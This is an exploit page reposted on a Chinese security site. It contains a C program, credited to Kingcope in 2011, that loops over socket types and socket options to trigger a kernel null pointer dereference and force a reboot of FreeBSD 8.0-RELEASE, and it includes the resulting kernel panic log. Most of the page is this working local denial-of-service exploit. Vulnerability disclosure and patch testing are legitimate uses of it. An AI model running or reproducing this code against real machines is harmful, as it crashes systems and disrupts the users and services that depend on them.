首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FreeBSD 8.0 Local Denial of Service (forced reboot)
来源:vfocus.net 作者:Kingcope 发布时间:2011-01-30  

# Exploit Title: FreeBSD local denial of service - forced reboot
# Date: 28. January 2011
# Author: Kingcope
# Software Link: http://www.freebsd.org
# Operating System: FreeBSD
# Tested on: 8.0-RELEASE

This source code when compiled and executed
will reboot at least FreeBSD 8.0-RELEASE because of a null pointer dereference.

#include <sys/types.h>
#include <sys/mman.h>
#define PAGE_SIZE 4096
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/socket.h>
main() {
       int k,fd,i2,i3,i4,i5,i6,i7,i8;
char *p;
      char buf[4096];

      for (i2=0;i2<256;i2++) {
       for (i3=0;i3<2;i3++) {
       for (i4=0;i4<2;i4++) {
       fd = socket(i2, i3, i4);
       if (fd < 0) continue;
       printf("SUCCESS!\n");
       for (i5=0;i5<100;i5++) {
       for (i6=0;i6<100;i6++) {
       setsockopt(fd, i5, i6, buf, 4);
       getsockopt(fd, i5, i6, buf, &i7);
       }}}}}
}

The crash dump looks like the following.

Jan 28 11:33:07 r00tme kernel:
Jan 28 11:33:07 r00tme kernel:
Jan 28 11:33:07 r00tme kernel: Fatal trap 12: page fault while in kernel mode
Jan 28 11:33:07 r00tme kernel: cpuid = 0; apic id = 00
Jan 28 11:33:07 r00tme kernel: fault virtual address    = 0xc
Jan 28 11:33:07 r00tme kernel: fault code               = supervisor
write, page not present
Jan 28 11:33:07 r00tme kernel: instruction pointer      = 0x20:0xc06143ba
Jan 28 11:33:07 r00tme kernel: stack pointer            = 0x28:0xcd1fa5b4
Jan 28 11:33:07 r00tme kernel: frame pointer            = 0x28:0xcd1fa85c
Jan 28 11:33:07 r00tme kernel: code segment             = base 0x0,
limit 0xfffff, type 0x1b
Jan 28 11:33:07 r00tme kernel: = DPL 0, pres 1, def32 1, gran 1
Jan 28 11:33:07 r00tme kernel: processor eflags = interrupt enabled,
resume, IOPL = 0
Jan 28 11:33:07 r00tme kernel: current process          = 1004 (bsdcrash)
Jan 28 11:33:07 r00tme kernel: trap number              = 12
Jan 28 11:33:07 r00tme kernel: panic: page fault
Jan 28 11:33:07 r00tme kernel: cpuid = 0
Jan 28 11:33:07 r00tme kernel: Uptime: 2m48s
Jan 28 11:33:07 r00tme kernel: Cannot dump. Device not defined or unavailable.
Jan 28 11:33:07 r00tme kernel: Automatic reboot in 15 seconds - press
a key on the console to abort
Jan 28 11:33:07 r00tme kernel: Rebooting...

The cause of the crash seems to be a specific network driver. Since
the crash is forced (only?) in a VMWare virtual machine the
exploitability can be dependent on the loaded device drivers
and installed hardware.
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Polycom SoundPoint IP Devices
·YuQaIFS V1.0 漏洞0day
·Virtuosa Phoenix Edition 5.2 A
·Oracle Document Capture Insecu
·Microsoft Internet Explorer MH
·Oracle Document Capture empop3
·WM Downloader 3.1.2.2 2010.04.
·Oracle Document Capture Actbar
·A-PDF All to MP3 Converter 2.0
·Oracle Document Capture 10.1.3
·Caedo HTTPd Server v 0.5.1 ALP
·WordPress Recip.ly Plugin 1.1.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved